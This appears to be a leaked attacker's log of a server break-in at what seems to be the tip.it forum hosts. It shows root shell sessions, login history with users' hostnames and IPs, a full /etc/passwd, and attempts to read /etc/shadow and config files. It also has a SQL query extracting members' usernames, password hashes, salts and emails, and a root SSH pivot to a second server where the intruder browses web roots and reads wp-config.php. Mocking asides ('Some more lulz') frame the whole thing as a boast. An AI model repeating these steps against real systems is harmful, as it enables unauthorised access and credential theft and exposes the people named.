peter pts/0 Tue Oct 11 05:23 - down (01:56) stu8fa4.kent.ac.uk
reboot system boot Mon Oct 10 09:42 (21:37) 2.6.30.10-105.2.23.fc11.x86_64
peter pts/1 Sun Oct 9 18:57 - 19:21 (00:24) stu8fa4.kent.ac.uk
root pts/1 Mon Oct 3 10:38 - 11:27 (00:48) 188-230-152-15.dynamic.t-2.net
peter pts/2 Sun Oct 2 08:04 - 09:15 (01:11) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
root pts/1 Sun Oct 2 08:04 - 00:46 (16:42) 188-230-152-15.dynamic.t-2.net
root pts/1 Fri Sep 30 01:24 - 08:24 (06:59) bsn-176-196-23.dial-up.dsl.siol.net
peter pts/1 Thu Sep 29 07:29 - 08:53 (01:23) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
root pts/1 Tue Sep 27 02:23 - 04:31 (02:07) 188-230-152-15.dynamic.t-2.net
root pts/2 Mon Sep 26 15:07 - 22:06 (06:59) 188-230-152-15.dynamic.t-2.net
peter pts/1 Mon Sep 26 14:27 - 16:33 (02:05) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
[root@forumx ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
avahi:x:499:498:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
backuppc:x:497:496::/var/lib/BackupPC:/usr/bin/nologin
torrent:x:496:495:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
bulat:x:500:500::/home/bulat:/bin/bash
lighttpd:x:495:490:lighttpd web server:/var/www/lighttpd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
avahi-autoipd:x:494:489:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
peter:x:501:48::/home/peter:/bin/bash
teamspeak:x:502:502::/home/teamspeak:/bin/bash
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
unbound:x:493:488:Unbound DNS resolver:/etc/unbound:/sbin/nologin
pulse:x:492:487:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sphinx:x:491:484:Sphinx Search:/var/lib/sphinx:/bin/bash
clamav:x:490:483:Clamav database update user:/var/lib/clamav:/sbin/nologin
[root@forumx ~]# cat /etc/shadow
[root@forumx html]# ls -al
total 36
drwxr-xr-x. 5 root root 4096 2010-08-18 15:20 .
drwxr-xr-x. 9 root root 4096 2010-04-06 17:31 ..
drwxr-xr-x 15 peter apache 4096 2011-10-11 06:07 forum.tip.it
-rw-r--r-- 1 root root 202 2008-07-12 20:50 index.html
-rw-r--r-- 1 root root 746 2008-06-05 13:51 index.html.bak
drwxr-xr-x 11 root root 4096 2008-06-14 10:39 lotro.tip.it
drwxrwxrwx 12 root root 4096 2008-06-14 10:39 nosf.tip.it
[root@forumx html]# cd forum.tip.it
[root@forumx forum.tip.it]# cat conf_global.php
Some more lulz-
mysql> select concat_ws(0x3a,members_l_username,members_pass_hash,members_pass_salt,email_full) from members limit 0,100;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 8246
Current database: forum2009
+-----------------------------------------------------------------------------------+
| concat_ws(0x3a,members_l_username,members_pass_hash,members_pass_salt,email_full) |
+-----------------------------------------------------------------------------------+
+-----------------------------------------------------------------------------------+
100 rows in set (0.13 sec)
--NEXT BOX
[root@forumx bulat]# ssh gaspez-arts.com -lroot
The authenticity of host 'gaspez-arts.com (66.36.248.197)' can't be established.
RSA key fingerprint is 58:7c:8e:2b:1c:80:41:ad:15:65:98:72:31:3a:48:8e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'gaspez-arts.com,66.36.248.197' (RSA) to the list of known hosts.
root@gaspez-arts.com's password:
Last login: Fri Sep 30 13:33:04 2011 from 188-230-152-15.dynamic.t-2.net
[root@mail ~]# uname -a;id
Linux mail.tip.it 2.6.23.17-88.fc7 #1 SMP Thu May 15 00:35:10 EDT 2008 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@mail arena_test]# last -a
eira pts/0 Mon Oct 10 04:53 - 07:06 (02:12) 95.233.233.42
eira pts/0 Sat Oct 8 01:22 - 03:37 (02:14) host17-203-dynamic.58-82-r.retail.telecomitalia.it
eira pts/1 Thu Oct 6 03:26 - 05:43 (02:17) host46-171-dynamic.56-82-r.retail.telecomitalia.it
[root@mail eira]# cat .bash_history | tail
ls -al
exit
cd /etc/httpd/conf.d
ls -al
su
cd /etc/httpd/conf.d
su
w
cd /etc/httpd/conf.d
su
[root@mail ~]# ls -la /var/www
total 16656
drwxr-xr-x 36 root root 4096 2011-06-23 02:56 .
drwxr-xr-x 25 root root 4096 2007-10-19 10:20 ..
drwxr-xr-x 12 eira eira 4096 2008-08-31 11:00 arena
drwxr-xr-x 10 eira eira 4096 2006-10-27 05:01 arena_old
drwxr-xr-x 5 eira eira 4096 2011-08-01 07:29 arredareinsieme
drwxr-xr-x 17 eira eira 4096 2009-11-30 18:16 asquinimobili
drwxr-xr-x 3 eira eira 4096 2010-07-06 11:23 atc
drwxr-xr-x 11 eira eira 4096 2010-03-29 16:07 cetekor
drwxr-xr-x 2 eira eira 4096 2010-03-19 11:40 cetekor_mom
drwxr-xr-x 2 root root 4096 2008-01-24 10:45 cgi-bin
drwxr-xr-x 7 eira eira 4096 2011-06-13 10:10 common
drwxr-xr-x 9 eira eira 4096 2009-03-29 07:01 control_panel
drwxr-xr-x 2 eira eira 4096 2011-06-13 10:09 dompdf
drwxr-xr-x 2 eira eira 4096 2008-08-26 12:17 easygadget
drwxr-xr-x 11 eira eira 4096 2011-07-07 02:56 ecolo
drwxr-xr-x 25 eira eira 4096 2011-06-07 03:18 eira
drwxr-xr-x 7 eira eira 4096 2009-04-22 06:45 erboristeria
drwxr-xr-x 3 root root 4096 2008-03-14 07:48 error
drwxr-xr-x 3 root root 4096 2008-01-24 10:45 html
-rw-r--r-- 1 root root 4229120 2007-05-05 16:24 html.tar
drwxr-xr-x 3 root root 4096 2008-05-24 04:10 icons
drwxr-xr-x 4 eira eira 4096 2006-11-18 16:19 img
-rw-r--r-- 1 root root 12584960 2007-05-05 16:24 img.tar
drwxr-xr-x 7 eira eira 4096 2010-03-05 02:10 irontrader
drwxr-xr-x 15 eira eira 4096 2010-07-14 05:43 kitepower
drwxr-xr-x 14 root root 12288 2008-03-14 07:48 manual
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 mauri
-rw-r--r-- 1 root root 20480 2007-05-05 16:24 mauri.tar
drwxr-xr-x 2 eira eira 4096 2009-05-17 06:43 mdarredamenti
drwxr-xr-x 17 eira eira 4096 2011-10-09 06:53 miniatures
drwxr-xr-x 10 eira eira 4096 2009-05-07 12:50 molino
drwxr-xr-x 18 eira eira 4096 2011-06-25 03:32 pavimenti
drwxr-xr-x 6 eira eira 4096 2011-06-25 18:02 supportservice
drwxr-xr-x 9 eira eira 4096 2010-08-08 12:59 trieste
drwxr-xr-x 3 eira eira 4096 2008-07-14 13:39 ts_affitta
drwxr-xr-x 2 webalizer root 12288 2011-10-01 04:22 usage
drwxr-xr-x 6 eira eira 4096 2007-01-02 07:24 virtualftp
drwxr-xr-x 14 eira eira 4096 2011-06-24 11:59 westistramodus
drwxr-xr-x 2 eira eira 4096 2010-03-01 03:31 wip
[root@mail www]# cd mauri
[root@mail mauri]# ls -al
total 84
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 .
drwxr-xr-x 36 root root 4096 2011-06-23 02:56 ..
drwxrwxr-x 2 eira eira 4096 2008-02-15 13:47 ~atc
drwxrwxr-x 2 eira eira 4096 2007-11-26 16:04 avatar
drwxrwxr-x 5 eira eira 4096 2008-02-16 04:53 blog
drwxrwxr-x 2 eira eira 4096 2011-05-30 08:11 DOM_PDF
drwxr-xr-x 2 eira eira 4096 2008-03-13 10:05 file
-rw-r--r-- 1 eira eira 4356 2007-08-14 11:37 index.html-1
-rw-r--r-- 1 eira eira 4565 2007-10-08 11:48 index.html-2
-rw-rw-r-- 1 eira eira 2217 2011-04-05 04:22 index.php
-rw-r--r-- 1 eira eira 4697 2007-10-08 11:56 index.php-1
-rw-r--r-- 1 eira eira 224 2008-06-06 18:06 ip.php
drwxrwxr-x 2 eira eira 4096 2008-03-13 09:37 lib
drwxr-xr-x 3 eira eira 4096 2010-05-06 05:40 PHP_PDF
drwxrwxr-x 2 eira eira 4096 2009-05-20 07:22 prove_cetekor
drwxrwxr-x 3 eira eira 4096 2008-06-23 12:46 prove_G45v
drwxr-xr-x 2 eira eira 4096 2007-10-08 11:46 styles
[root@mail mauri]# cd blog
[root@mail blog]# ls -al
total 252
drwxrwxr-x 5 eira eira 4096 2008-02-16 04:53 .
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 ..
-rw-r--r-- 1 eira eira 186 2008-02-16 04:51 .htaccess
-rw-r--r-- 1 eira eira 94 2006-11-19 01:56 index.php
-rw-r--r-- 1 eira eira 15127 2003-04-01 07:12 license.txt
-rw-r--r-- 1 eira eira 7635 2007-08-28 13:01 readme.html
drwxr-xr-x 7 eira eira 4096 2008-02-04 22:06 wp-admin
-rw-r--r-- 1 eira eira 33489 2007-12-27 18:47 wp-app.php
-rw-r--r-- 1 eira eira 129 2007-08-02 18:45 wp-atom.php
-rw-r--r-- 1 eira eira 997 2007-05-09 10:18 wp-blog-header.php
-rw-r--r-- 1 eira eira 2923 2007-07-04 10:12 wp-comments-post.php
-rw-r--r-- 1 eira eira 153 2007-08-02 18:45 wp-commentsrss2.php
-rw-r--r-- 1 eira eira 947 2007-10-22 07:05 wp-config.php
-rw-r--r-- 1 eira eira 965 2007-05-12 12:29 wp-config-sample.php
drwxr-xr-x 6 eira eira 4096 2008-02-04 22:06 wp-content
-rw-r--r-- 1 eira eira 851 2007-08-02 18:45 wp-cron.php
-rw-r--r-- 1 eira eira 120 2006-11-19 01:56 wp-feed.php
drwxr-xr-x 4 eira eira 4096 2008-02-04 22:06 wp-includes
-rw-r--r-- 1 eira eira 1525 2007-09-23 13:25 wp-links-opml.php
-rw-r--r-- 1 eira eira 16654 2007-09-25 17:17 wp-login.php
-rw-r--r-- 1 eira eira 5587 2007-12-29 13:38 wp-mail.php
-rw-r--r-- 1 eira eira 296 2007-09-18 16:23 wp-pass.php
-rw-r--r-- 1 eira eira 190 2007-08-02 18:45 wp-rdf.php
-rw-r--r-- 1 eira eira 251 2006-10-11 03:26 wp-register.php
-rw-r--r-- 1 eira eira 129 2007-08-02 18:45 wp-rss2.php
-rw-r--r-- 1 eira eira 127 2007-08-02 18:45 wp-rss.php
-rw-r--r-- 1 eira eira 10834 2007-12-20 20:57 wp-settings.php
-rw-r--r-- 1 eira eira 3520 2007-08-02 18:45 wp-trackback.php
-rw-r--r-- 1 eira eira 61403 2008-02-04 12:52 xmlrpc.php
[root@mail blog]# cat wp-config.php
....Etc....I think you get the fish.